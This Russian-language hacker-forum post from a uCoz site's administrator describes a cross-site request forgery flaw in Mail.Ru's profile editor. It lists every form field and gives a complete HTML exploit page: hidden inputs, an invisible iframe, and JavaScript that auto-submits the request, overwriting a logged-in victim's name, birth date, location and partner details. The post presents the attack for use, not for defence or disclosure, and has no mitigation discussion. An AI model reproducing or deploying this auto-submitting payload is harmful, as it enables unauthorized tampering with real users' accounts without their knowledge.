Stas'M Corp.
Главная | XSRF изменение анкеты (актуально) - Форум | Регистрация | Вход
 
Суббота, 23.09.2017, 17:39
Приветствую Вас Гость | RSS
| ENG | RUS
Форма входа

Информация о тебе:

IP-адрес: 54.224.158.232
Браузер: Неизвестен
Основные разделы
Мини-чат
Loading Загрузка сообщений...
Наш опрос
Оцените мой сайт
Всего ответов: 1808
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Administrator, Phantom, b@bskEnízm 
Форум » Хакерский форум » Mail.Ru » XSRF изменение анкеты (актуально)
XSRF изменение анкеты (актуально)
AdministratorДата: Понедельник, 30.05.2011, 17:59 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 89
Награды: 39
Репутация: 50
Статус: Offline
XSRF уязвимость позволяет атакующему изменить личные данные пользователя.
Создаётся специальный HTML файл с формой и с использованием JavaScript.

Образец запроса:

URL:http://my.mail.ru/my/userinfo
Метод:POST
Кодировка:Windows-1251
Поля формы:
domain<пустое>
mra1
backhttp://my.mail.ru/my/userinfo
IDUprPnBej
Count1
NickNameНикнейм
FirstNameИмя
LastNameФамилия
MaidenNameДевичья фамилия
BirthDayДень рождения
BirthMonthМесяц рождения
BirthYearГод рождения
ShowAgeПоказывать возраст (0 или 1)
SexПол (0 = нет, 1 = м, 2 = ж)
Mrim.CountryСтрана (24 = Россия)
Mrim.RegionГород (25 = Москва)
geo_countryIdСтрана (24 = Россия)
geo_regionId999999
geo_cityIdГород (25 = Москва)
your_townГород, страна и т.п. в текстовом виде
geo_countryundefined
MaritalStatusСемейное положение (0..14)
PartnerEmailМейл партнёра
PartnerNickНик партнёра
ShowStatПоказывать при поиске (on или off)
SaveUInfo1

Образец HTML кода, использующего эту уязвимость:

Code
<form id="userinfo" method="POST" action="http://my.mail.ru/my/userinfo" target="userinfo_to">
<input type="hidden" name="domain" value="">
<input type="hidden" name="mra" value="1">
<input type="hidden" name="back" value="http://my.mail.ru/my/userinfo">
<input type="hidden" name="ID" value="UprPnBej">
<input type="hidden" name="Count" value="1">
<input type="hidden" name="NickName" value="Barak Оbama">
<input type="hidden" name="FirstName" value="Барак">
<input type="hidden" name="LastName" value="Обама">
<input type="hidden" name="MaidenName" value="">
<input type="hidden" name="BirthDay" value="4">
<input type="hidden" name="BirthMonth" value="8">
<input type="hidden" name="BirthYear" value="1961">
<input type="hidden" name="ShowAge" value="1">
<input type="hidden" name="Sex" value="1">
<input type="hidden" name="Mrim.Country" value="24">
<input type="hidden" name="Mrim.Region" value="25">
<input type="hidden" name="geo_countryId" value="24">
<input type="hidden" name="geo_regionId" value="999999">
<input type="hidden" name="geo_cityId" value="25">
<input type="hidden" name="your_town" value="г. Мунтаун, Луна, Солнечная система">
<input type="hidden" name="geo_country" value="undefined">
<input type="hidden" name="MaritalStatus" value="13">
<input type="hidden" name="PartnerEmail" value="support@corp.mail.ru">
<input type="hidden" name="PartnerNick" value="Служба поддержки">
<input type="hidden" name="ShowStat" value="on">
<input type="hidden" name="SaveUInfo" value="1">
<input type="submit" value="Submit">
</form>
<iframe name="userinfo_to" width="0" height="0" scrolling="no" frameborder="0"></iframe>
<script type="text/javascript">
document.getElementById('userinfo').submit();
</script>


Stas'M
 
Форум » Хакерский форум » Mail.Ru » XSRF изменение анкеты (актуально)
Страница 1 из 11
Поиск:

Веб приложения
Пожертвование / Donate
WMWebMoney transferZ358077191062
WMWebMoney transferE208225402366
WMWebMoney transferR303537803958
WMWebMoney transferB345247247920
Reg.ruReg.ru transfer9900126333
WUWestern Union transferuse feedback form
BTCBitcoin transferuse feedback form
Друзья сайта

Просим вас посещать сайты наших друзей! Они достойны такого же внимания как и мы!

Пользователи

Пользователи онлайн:
Статистика

Copyright © Stas'M Corp. 2017Хостинг от uCoz